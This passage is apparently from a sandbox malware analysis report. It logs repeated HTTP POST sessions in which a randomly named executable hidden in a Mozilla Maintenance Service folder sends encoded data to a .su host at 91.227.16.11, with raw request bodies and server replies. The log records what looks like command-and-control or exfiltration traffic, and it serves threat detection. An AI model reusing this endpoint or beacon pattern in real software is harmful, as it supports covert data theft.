                                                                    Mar 5, 2024 22:28:20.069880962 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    48 | 192.168.2.5 | 49769 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:20.381099939 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:20.593120098 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:20.593384981 CET | 2596 | OUT | Data: 2596-byte request body
                                                                    Mar 5, 2024 22:28:20.834520102 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    49 | 192.168.2.5 | 49770 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:21.160624981 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:21.371062994 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:21.371265888 CET | 2596 | OUT | Data: 2596-byte request body
                                                                    Mar 5, 2024 22:28:21.609965086 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    50 | 192.168.2.5 | 49771 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:21.941019058 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:22.149682999 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:22.149907112 CET | 2596 | OUT | Data: 2596-byte request body
                                                                    Mar 5, 2024 22:28:22.384341002 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    51 | 192.168.2.5 | 49772 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:22.726752043 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:22.937387943 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:22.937720060 CET | 2596 | OUT | Data: 2596-byte request body
                                                                    Mar 5, 2024 22:28:23.175699949 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    52 | 192.168.2.5 | 49773 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:23.502744913 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:23.711553097 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:23.945357084 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    53 | 192.168.2.5 | 49774 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:24.287301064 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:24.496103048 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:24.732176065 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    54 | 192.168.2.5 | 49776 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:25.271505117 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1892
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:25.481096029 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:25.719048023 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    55 | 192.168.2.5 | 49777 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:25.392493963 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:25.601495981 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:25.837702990 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    56 | 192.168.2.5 | 49778 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:26.176038980 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:26.386712074 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:26.633552074 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    57 | 192.168.2.5 | 49779 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:26.973067045 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:27.183384895 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:27.422560930 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    58 | 192.168.2.5 | 49780 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:27.761527061 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:27.974004984 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:28.214462996 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    59 | 192.168.2.5 | 49781 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:28.555927992 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:28.766170979 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:29.004904032 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    60 | 192.168.2.5 | 49782 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:29.332469940 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:29.543406010 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:29.781369925 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    61 | 192.168.2.5 | 49783 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:30.114413977 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:30.324275017 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:30.561702013 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    62 | 192.168.2.5 | 49784 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:30.895553112 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:31.107105970 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:31.107331991 CET | 2596 | OUT | Data Raw: 54 5b 51 5a 5e 59 55 52 5e 57 5a 51 57 58 50 53 54 51 54 5d 56 54 57 5a 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T[QZ^YUR^WZQWXPSTQT]VTWZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9C/1"R3:'5=8/0;3\%6< #<#]'%Z>-)%Z"!Q*-
                                                                    Mar 5, 2024 22:28:31.343434095 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    63 | 192.168.2.5 | 49785 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:30.944545984 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:31.154288054 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:31.154508114 CET | 1920 | OUT | Data Raw: 54 5c 51 5d 5b 5f 55 51 5e 57 5a 51 57 5e 50 5d 54 52 54 5f 56 5a 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T\Q][_UQ^WZQW^P]TRT_VZWXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/22V$%&%:\8"^'&*;#/<"<$?Y1,9;%Z"!Q*
                                                                    Mar 5, 2024 22:28:31.390526056 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    64 | 192.168.2.5 | 49786 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:31.676419020 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:31.888190031 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:31.888463020 CET | 2596 | OUT | Data Raw: 54 5e 51 5e 5e 5b 55 5c 5e 57 5a 51 57 58 50 59 54 56 54 58 56 5b 57 59 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T^Q^^[U\^WZQWXPYTVTXV[WYT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9A.1-$U"&55/?X3<&9<54#/<$#Y%:;%Z"!Q*-
                                                                    Mar 5, 2024 22:28:32.127346992 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    65 | 192.168.2.5 | 49787 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:32.528229952 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:32.739315987 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:32.739512920 CET | 2596 | OUT | Data Raw: 51 59 51 5c 5e 5c 55 53 5e 57 5a 51 57 58 50 5e 54 54 54 58 56 5b 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QYQ\^\US^WZQWXP^TTTXV[WTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]98')]'6*];)08(1;56//]0$$?>;%Z"!Q*-
                                                                    Mar 5, 2024 22:28:32.980446100 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    66 | 192.168.2.5 | 49788 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
